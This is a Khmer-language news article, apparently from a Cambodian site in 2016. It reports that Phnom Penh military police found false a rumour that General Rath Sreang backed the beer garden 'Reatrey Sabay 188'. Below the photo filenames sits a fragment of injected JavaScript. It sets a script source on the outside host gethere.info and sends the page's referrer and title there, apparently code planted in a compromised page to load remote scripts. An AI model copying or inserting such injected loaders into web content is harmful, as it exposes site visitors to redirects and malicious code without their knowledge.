ព្រឹតិ្តការណ៍ថ្មីៗ

Update:អាជ្ញាធរចូលឃាត់ចង់វាយទៀត តែលោកប្អូនថាអាងលោក រ័ត្ន ស្រ៊ាង​ នោះជារឿងមិនពិត

2 ឆ្នាំ មុន 1 tnn_admin

 

ភ្នំពេញ៖ ក្រោយពីបានកោះហៅម្ចាស់ហាង និងសាក្សីនៅកន្លែងកើតហេតុចូលមកបំភ្លឺកាលពីរសៀលថ្ងៃទី២៤នេះ ទើបដឹងថារឿងដែលបានកើតឡើងកាលពីវេលាយប់ម្សិលម៉ិញថ្ងៃទី២៣ឧសភានោះ ជារឿងមិនពិតសោះដែលបានថាទីតាំងនេះ មិនធម្មតាអាង អាវុធហត្ថរាជធានីភ្នំពេញ ដោយប្រើឈ្មោះឧត្តមសេនីយ៍ រ័ត្ន ស្រ៊ាងនៅពីក្រោយខ្នងនោះ តាមពិតគឺមិនមាន ។

គួររំលឹកថាកាលពីយប់ថ្ងៃទី២៣ខែឧសភាវេលាម៉ោង៩និង១០នាទី មានករណីមួយដែលបានចោទថា ទីតាំងគ្រឿងក្លែមមួយមានឈ្មោះរាត្រីសប្បាយ១៨៨ ស្ថិតក្នុងភូមិដំណាក់ធំ៣សង្កាត់ស្ទឹងមានជ័យមាន ខណ្ឌមានជ័យ មានការឈ្លោះប្រកែកគ្នា ហើយជនបង្កទៅបាត់លុះ ដល់ពេលអ្នកសារព័ត៌មានចុះថត មានអ្នកនៅកន្លែងកើតហេតុថាទីតាំងនេះជាទីតាំងដែលលោករ័ត្ន ស្រ៊ាង នៅពីក្រោយខ្នង ហើយជិះម៉ូតូទៅបាត់។

សូមបញ្ជាក់ថាកាលពីរសៀលថ្ងៃទី២៤ខែឧសភាឆ្នាំ២០១៦នេះក្រោយពីបានចុះស្រាវជ្រាវនិងនាំខ្លួនម្ចាស់ហាងរួមមានសាក្សីមកមូលដ្ឋានអាវុធហត្ថរាជធានីភ្នំពេញទើបដឹងថា ករណីដែលប្រើឈ្មោះ លោក រ័ត្ន ស្រ៊ាង មេបញ្ជាការកងរាជអាវុធហត្ថរាជធានីនៅពីក្រោយខ្នងនោះជារឿងមិនពិត ហើយធ្វើអោយមានការយល់ច្រឡំទាំងស្រុង។

បណ្តាញព័តមានTNN សូមនាំការបកស្រាយនូវសេចក្តីពិតដូចខាងក្រោមដែលសាក្សីបានធ្វើការបកស្រាយ៖

នៅថ្ងៃទី២៣វេលាម៉ោងមុន៩និង១០នាទីយប់ មានជនមួយក្រុមបាននាំគ្នាមកឈប់នៅទីតាំងផឹកស៊ីខាងលើ ពេលអ្នកព័ត៌មានឆ្លងកាត់ទីនោះដោយឃើញមានការឈប់ម៉ូតូច្រើនបែបនេះ អ្នកសារព័ត៌មានក៏បានផ្តិតយករូបភាព ហើយមានអ្នកនិយាយថា ថតធ្វើអីបើគេឈ្មោះគ្នារួចហើយ (តាមពិតការឈ្លោះគ្នានេះមិនបានកើតឡើងទេ ដោយមានការបំរុងឈ្លោះគ្នានៅទីតាំងផ្សេង បន្តមកពួកគេបានមកឈប់និយាយគ្នានៅមុខហាង រាត្រីសប្បាយ១៨៨ខាងលើ មិនយូរប៉ុន្មានម្នាក់ក្នុងចំណោមអ្នកទាំងនោះបាននិយាយាថា ឈប់ទីនេះធ្វើអីទៀត ប្រយ័ត្នសមត្ថកិច្ចចាប់យកទៅប៉ុស្តិ៏ទៅ លឺដូចនេះ០២នាក់ក្នុងចំណោមពួកគេ បាននិយាយតបថា ខ្លាចអីបើទោះនគរបាលមកឬ ព្រះច័ន្ទ ហើយបើលោករ័ត្ន ស្រ៊ាងមកក៏មិនអីដែរ ។

សាក្សីបានបន្តទៀតថា នៅទីនោះក៏គេឃើញមានអ្នកខ្លះបានអះអាងថាខ្លួនជាអាជ្ញាធរ  ដែលបានចូលទៅសម្រួល តែម្នាក់នៃជនចង់បង្កនោះបានប្រើពាក្យសម្តីមិនសមរម្យទៅលើពួកគាត់  មិនតែប៉ុណ្ណោះក្នុងចំណោមជនទាំងនោះដូចជាស្រវឹងហើយ តែមានម្នាក់បានប្រើពាក្យថាខ្លួនឯងជាម្ចាស់ហាង ប៉ុន្តែមិនដឹងថាហាងស្បែកជើងឬហាងអីណាមួយទេ ដោយនិយាយថាមិនខ្លាចលោករ័ត្ន ស៊្រាង រហូតដល់យូរបន្តិចទើបពួកគេនាំគ្នាជិះចេញទៅវិញបាត់ទៅ។

ក្នុងជំនួបនៃការស្វែងចង់ដឹងនូវព័ត៌មាននេះដែរ ក្រោយបានសាកសួរទើបដឹងថារឿងនេះជារឿងមានការយល់ច្រឡំនូវពាក្យសម្តីរបស់ជនមួយក្រុមដែលបានមកឈប់នៅទីតាំងខាងលើដោយប្រើពាក្យម្ចាស់ហាង។

ក្រោយពីបានបកស្រាយដឹងមូលហេតុពិតហើយនោះ ម្ចាស់ហាង និងសាក្សីត្រូវបានអប់រំអោយត្រឡប់មកវិញ ជាមួយគ្នានេះដែរ លោកវរសេនីយ៍ឯក ពូ ដាវី មេបញ្ជាការរងកងរាជអាវុធហត្ថរាជធានីភ្នំពេញ បានសំណូមពរនិងសូមអោយប្រជាពលរដ្ឋទាំងអស់មានការសហការល្អ និងផ្តល់ព័ត៌មានដល់សមត្ថកិច្ច  ជាពិសេសគឺសមត្ថកិច្ចមូលដ្ឋានតែម្តងដែលពួកគាត់នៅជិតយើងបំផុត  ដើម្បីចូលរួមចំណែកទាំងអស់គ្នាអនុវត្តន៍ភូមិ ឃុំសង្កាត់ មានសុវត្ថិភាពអោយបានល្អប្រសើរ។

 

20160523_205722_2 20160523_205638_2 20160523_205722_1

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

error: Content is protected !!